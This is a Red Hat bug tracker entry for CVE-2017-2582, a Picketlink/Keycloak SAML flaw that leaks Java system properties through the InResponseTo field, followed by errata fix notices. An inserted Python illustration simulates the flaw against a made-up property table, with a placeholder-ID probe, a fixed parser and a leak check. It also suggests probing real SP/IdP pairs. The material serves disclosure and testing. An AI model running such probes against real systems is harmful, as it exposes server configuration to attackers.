Bug 1410481 - (CVE-2017-2582) CVE-2017-2582 picketlink, keycloak: SAML request parser replaces special strings with system properties
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Assigned To: Red Hat Product Security
Whiteboard: impact=moderate,public=20170926,repor...
Keywords: Security
Depends On: 1414137 1414138
Blocks: 1410492 1493931 1510311
Reported: 2017-01-05 10:31 EST by Adam Mariš
Modified: 2018-10-19 17:39 EDT
Doc Text:
While parsing SAML messages, the StaxParserUtil class of Picketlink replaces special strings in attribute values with the values of Java system properties. An attacker can use this to read system property values on the attacked system: by setting the SAML request ID field to a placeholder for a chosen system property, the attacker receives the resolved value back in the "InResponseTo" field of the response.
External Trackers

Tracker                 ID              Priority  Status        Summary                                                                                  Last Updated
Red Hat Product Errata  RHSA-2017:2808  normal    SHIPPED_LIVE  Important: Red Hat JBoss Enterprise Application Platform security update                2017-09-26 18:39:54 EDT
Red Hat Product Errata  RHSA-2017:2809  normal    SHIPPED_LIVE  Important: Red Hat JBoss Enterprise Application Platform security update                2017-09-26 18:51:56 EDT
Red Hat Product Errata  RHSA-2017:2810  normal    SHIPPED_LIVE  Important: Red Hat JBoss Enterprise Application Platform security update                2017-09-26 17:58:02 EDT
Red Hat Product Errata  RHSA-2017:2811  normal    SHIPPED_LIVE  Important: eap7-jboss-ec2-eap security update                                            2017-09-26 19:14:16 EDT
Red Hat Product Errata  RHSA-2017:3216  normal    SHIPPED_LIVE  Moderate: Red Hat JBoss Enterprise Application Platform 6.4.18 security update          2017-11-14 20:30:42 EST
Red Hat Product Errata  RHSA-2017:3217  normal    SHIPPED_LIVE  Moderate: Red Hat JBoss Enterprise Application Platform 6.4.18 security update          2017-11-14 20:27:28 EST
Red Hat Product Errata  RHSA-2017:3218  normal    SHIPPED_LIVE  Moderate: Red Hat JBoss Enterprise Application Platform 6.4.18 security update          2017-11-14 20:23:58 EST
Red Hat Product Errata  RHSA-2017:3219  normal    SHIPPED_LIVE  Moderate: jboss-ec2-eap security, bug fix, and enhancement update for EAP 6.4.18        2017-11-14 20:51:06 EST
Red Hat Product Errata  RHSA-2017:3220  normal    SHIPPED_LIVE  Moderate: Red Hat JBoss Enterprise Application Platform 6.4.18 security update          2017-11-14 20:37:47 EST
Red Hat Product Errata  RHSA-2018:2740  -         -             -                                                                                        2018-09-24 17:46 EDT
Red Hat Product Errata  RHSA-2018:2741  -         -             -                                                                                        2018-09-24 18:04 EDT
Red Hat Product Errata  RHSA-2018:2742  -         -             -                                                                                        2018-09-24 18:08 EDT
Red Hat Product Errata  RHSA-2018:2743  -         -             -                                                                                        2018-09-24 18:09 EDT
Description Adam Mariš 2017-01-05 10:31:11 EST
It was found that the Picketlink implementation replaces special strings for obtaining attribute values with system property values while parsing SAML messages. An attacker can misuse this to determine the values of system properties on the attacked system by formatting the SAML request ID field as the system property name of their choosing, obtaining the property value in the "InResponseTo" field of the response.

Upstream bug (for Keycloak):

https://issues.jboss.org/browse/KEYCLOAK-4160
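The mechanism described in the report, as an added illustration that is not code from Picketlink or Keycloak: a SAML AuthnRequest parser that expands placeholders in attribute values against the JVM's system properties, next to the hardened form that leaves attribute values alone. The attacker-side probe sends a request whose ID attribute is a placeholder and reads back what the IdP echoes in InResponseTo. The ${name} placeholder syntax, the in-memory table standing in for System.getProperties(), and the minimal Response element are assumptions for this example; the page does not state the exact placeholder format.

```python
"""
Added illustration for CVE-2017-2582 (not code from Picketlink or Keycloak).

Assumptions, not taken from the bug report: placeholders use the ${name}
syntax, and SYSTEM_PROPERTIES is a constructed stand-in for the JVM's
System.getProperties() table.
"""
import re
import xml.etree.ElementTree as ET

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
ET.register_namespace("samlp", SAMLP)

# Constructed sample data: what an EAP/Keycloak JVM might expose.
SYSTEM_PROPERTIES = {
    "java.home": "/usr/lib/jvm/java-8-openjdk",
    "user.name": "jboss",
    "jboss.server.config.dir": "/opt/eap/standalone/configuration",
}

_PLACEHOLDER = re.compile(r"\$\{([^}]+)\}")


def expand_system_properties(value: str) -> str:
    """Vulnerable behaviour: resolve every ${prop} against the property table.
    Unknown property names are left untouched, as a Java lookup would."""
    def repl(match: re.Match) -> str:
        return SYSTEM_PROPERTIES.get(match.group(1), match.group(0))
    return _PLACEHOLDER.sub(repl, value)


def parse_authn_request(xml_text: str, expand: bool) -> dict:
    """Return the attributes of the samlp:AuthnRequest root element.
    expand=True mimics the pre-fix parser; expand=False is the hardened form,
    which treats attribute values as opaque strings."""
    root = ET.fromstring(xml_text)
    if root.tag != f"{{{SAMLP}}}AuthnRequest":
        raise ValueError("not a samlp:AuthnRequest")
    attrs = dict(root.attrib)
    if expand:
        attrs = {k: expand_system_properties(v) for k, v in attrs.items()}
    return attrs


def build_response(request_attrs: dict) -> str:
    """Minimal IdP response (assumed shape): InResponseTo echoes the parsed ID."""
    resp = ET.Element(f"{{{SAMLP}}}Response", {
        "ID": "_resp-1",
        "Version": "2.0",
        "InResponseTo": request_attrs["ID"],
    })
    return ET.tostring(resp, encoding="unicode")


def in_response_to(response_xml: str) -> str:
    """Attacker side: pull the reflected value out of the Response."""
    return ET.fromstring(response_xml).attrib["InResponseTo"]


def probe(property_name: str, expand: bool) -> str:
    """Send an AuthnRequest whose ID is ${property_name} through the parser
    and return whatever the IdP placed in InResponseTo."""
    request = (
        f'<samlp:AuthnRequest xmlns:samlp="{SAMLP}" '
        f'ID="${{{property_name}}}" Version="2.0" '
        f'IssueInstant="2017-01-05T15:31:00Z"/>'
    )
    return in_response_to(build_response(parse_authn_request(request, expand)))


def leaked(property_name: str, observed: str) -> bool:
    """Detection check: a patched IdP reflects the literal placeholder;
    anything else means the parser resolved it."""
    return observed != f"${{{property_name}}}"


if __name__ == "__main__":
    for prop in SYSTEM_PROPERTIES:
        before = probe(prop, expand=True)
        after = probe(prop, expand=False)
        print(f"{prop}: vulnerable -> {before!r}, fixed -> {after!r}")
```

The same comparison works as a black-box check against a real SP/IdP pair: send an AuthnRequest whose ID is a placeholder for a property you know exists and compare InResponseTo with what you sent; the hardened parser must return the literal placeholder, since a SAML ID is an opaque xs:ID and never a template.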
Comment 2 Adam Mariš 2017-01-10 06:44:35 EST
Acknowledgments:

Name: Hynek Mlnarik (Red Hat)
Comment 5 Jason Shepherd 2017-09-17 21:50:47 EDT
JON-3 is not affected by this issue because it is not supported as an SSO Identity Provider.
Comment 6 errata-xmlrpc 2017-09-26 13:58:22 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0.8

Via RHSA-2017:2810 https://access.redhat.com/errata/RHSA-2017:2810
Comment 7 errata-xmlrpc 2017-09-26 14:41:05 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7

Via RHSA-2017:2808 https://access.redhat.com/errata/RHSA-2017:2808
Comment 8 errata-xmlrpc 2017-09-26 14:53:21 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6

Via RHSA-2017:2809 https://access.redhat.com/errata/RHSA-2017:2809
Comment 9 errata-xmlrpc 2017-09-26 15:14:39 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7
  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6

Via RHSA-2017:2811 https://access.redhat.com/errata/RHSA-2017:2811
Comment 11 errata-xmlrpc 2017-11-14 15:37:20 EST
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7

Via RHSA-2017:3218 https://access.redhat.com/errata/RHSA-2017:3218
Comment 12 errata-xmlrpc 2017-11-14 15:38:03 EST
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2017:3217 https://access.redhat.com/errata/RHSA-2017:3217
Comment 13 errata-xmlrpc 2017-11-14 15:38:26 EST
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 5

Via RHSA-2017:3216 https://access.redhat.com/errata/RHSA-2017:3216
Comment 14 errata-xmlrpc 2017-11-14 15:39:49 EST
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform

Via RHSA-2017:3220 https://access.redhat.com/errata/RHSA-2017:3220
Comment 15 errata-xmlrpc 2017-11-14 15:51:31 EST
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2017:3219 https://access.redhat.com/errata/RHSA-2017:3219
Comment 20 Jason Shepherd 2018-01-16 23:39:00 EST
RHMAP services, UPS and Millicore don't use SAML features of embedded Keycloak.
Comment 21 errata-xmlrpc 2018-09-24 17:46:28 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform

Via RHSA-2018:2740 https://access.redhat.com/errata/RHSA-2018:2740
Comment 22 errata-xmlrpc 2018-09-24 18:04:20 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7

Via RHSA-2018:2741 https://access.redhat.com/errata/RHSA-2018:2741
Comment 23 errata-xmlrpc 2018-09-24 18:08:12 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 5

Via RHSA-2018:2742 https://access.redhat.com/errata/RHSA-2018:2742
Comment 24 errata-xmlrpc 2018-09-24 18:09:29 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2018:2743 https://access.redhat.com/errata/RHSA-2018:2743